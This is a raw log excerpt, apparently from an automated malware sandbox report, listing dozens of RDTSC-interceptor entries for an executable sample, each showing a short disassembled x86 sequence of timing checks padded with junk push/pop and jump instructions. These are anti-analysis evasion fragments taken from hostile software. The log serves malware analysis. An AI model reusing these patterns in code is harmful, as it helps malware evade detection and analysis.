                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBEAD5 second address: FBEAF2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F022C800544h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBEAF2 second address: FBEAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBEAFA second address: FBEAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBEAFF second address: FBEB09 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F022CCCFB0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FBEB09 second address: FBEB10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FC4F5F second address: FC4F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022CCCFB0Dh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FC82BE second address: FC82DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F022C800549h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F90D80 second address: F90D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F90D84 second address: F70B26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F022C800538h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 call dword ptr [ebp+122D32EAh] 0x0000002a pushad 0x0000002b push esi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9127E second address: F91282 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F91282 second address: F912A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jmp 00007F022C800548h 0x00000010 pop eax 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F91432 second address: F91436 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F91436 second address: F9146A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jng 00007F022C80053Eh 0x0000000e jc 00007F022C800538h 0x00000014 pushad 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F022C800548h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9146A second address: F914AA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F022CCCFB0Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jns 00007F022CCCFB17h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 jmp 00007F022CCCFB0Fh 0x0000001e pop ecx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F915F9 second address: F91603 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F022C800536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F91747 second address: F9174B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9174B second address: F91775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F022C800547h 0x0000000c pop esi 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F91775 second address: F917A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 pushad 0x00000009 jnl 00007F022CCCFB0Ch 0x0000000f jmp 00007F022CCCFB0Eh 0x00000014 popad 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F917A2 second address: F917A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F917A6 second address: F917AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F91869 second address: F9186D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F9186D second address: F91877 instructions: 0x00000000 rdtsc 0x00000002 je 00007F022CCCFB0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F920C6 second address: F92112 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F022C800536h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F022C800549h 0x00000015 mov eax, dword ptr [eax] 0x00000017 push ebx 0x00000018 jmp 00007F022C80053Fh 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 jns 00007F022C800536h 0x0000002b push eax 0x0000002c pop eax 0x0000002d popad 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F92112 second address: F92118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F7162C second address: F71630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F71630 second address: F71642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022CCCFB0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FC859E second address: FC85B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022C800542h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FC85B5 second address: FC85C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnp 00007F022CCCFB06h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FC8723 second address: FC8729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FC89DE second address: FC89E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FC89E2 second address: FC89E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FC89E8 second address: FC8A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F022CCCFB12h 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FC8A07 second address: FC8A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FC8A0B second address: FC8A1B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F022CCCFB06h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FC8A1B second address: FC8A34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800545h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FC8A34 second address: FC8A6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 js 00007F022CCCFB06h 0x0000000b push edx 0x0000000c pop edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007F022CCCFB12h 0x00000016 jmp 00007F022CCCFB12h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FC8D50 second address: FC8D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jg 00007F022C80053Ch 0x0000000d push ebx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jmp 00007F022C800540h 0x00000015 pop ebx 0x00000016 pushad 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FC8F50 second address: FC8F55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCED68 second address: FCED6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCED6F second address: FCED74 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCDB17 second address: FCDB1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCDB1B second address: FCDB23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCDB23 second address: FCDB48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800544h 0x00000007 push edi 0x00000008 jbe 00007F022C800536h 0x0000000e pop edi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCDB48 second address: FCDB4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCE296 second address: FCE2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F022C800536h 0x0000000a jmp 00007F022C800544h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCE2BB second address: FCE2BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCE2BF second address: FCE2C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCE2C3 second address: FCE2CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCE2CD second address: FCE2D8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCE2D8 second address: FCE2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F022CCCFB18h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCE2F6 second address: FCE320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edx 0x00000007 jmp 00007F022C800549h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 js 00007F022C800536h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCE5EA second address: FCE5F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jne 00007F022CCCFB06h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCE75D second address: FCE77E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push esi 0x00000006 jmp 00007F022C800548h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCE77E second address: FCE784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCE784 second address: FCE78A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCE78A second address: FCE790 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCE790 second address: FCE7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F022C800542h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCEBE5 second address: FCEBEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCD444 second address: FCD44B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCD44B second address: FCD45F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F022CCCFB10h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FCD45F second address: FCD477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800544h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FD2FCC second address: FD2FDC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 jnc 00007F022CCCFB06h 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FD5507 second address: FD550D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FD550D second address: FD5519 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F022CCCFB06h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FD5519 second address: FD5541 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C80053Dh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jne 00007F022C800536h 0x00000015 ja 00007F022C800536h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FD5684 second address: FD56A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 jmp 00007F022CCCFB15h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FD56A0 second address: FD56A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDA24B second address: FDA251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDA251 second address: FDA25E instructions: 0x00000000 rdtsc 0x00000002 jno 00007F022C800536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDA25E second address: FDA264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FD9963 second address: FD997F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F022C800547h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FD997F second address: FD9985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FD9C4A second address: FD9C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FD9C4E second address: FD9C53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FD9C53 second address: FD9C5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDF9AD second address: FDF9B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F022CCCFB12h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDF9B9 second address: FDF9BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE230 second address: FDE235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE235 second address: FDE23B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE23B second address: FDE23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE55B second address: FDE561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE561 second address: FDE565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE68D second address: FDE6B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jbe 00007F022C800536h 0x0000000e pop edx 0x0000000f jmp 00007F022C80053Fh 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE6B1 second address: FDE6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jno 00007F022CCCFB0Ah 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE6C0 second address: FDE6EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F022C800536h 0x00000009 pushad 0x0000000a popad 0x0000000b jno 00007F022C800536h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F022C800544h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE6EA second address: FDE6EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE816 second address: FDE824 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F022C80053Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE824 second address: FDE858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F022CCCFB19h 0x0000000e jmp 00007F022CCCFB12h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE858 second address: FDE85E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE85E second address: FDE862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE862 second address: FDE866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE9AD second address: FDE9B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F022CCCFB06h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE9B8 second address: FDE9C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: FDE9C0 second address: FDE9DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F022CCCFB13h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\EI3TafelpV.exeRDTSC instruction interceptor: First address: F91C09 second address: F91C16 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
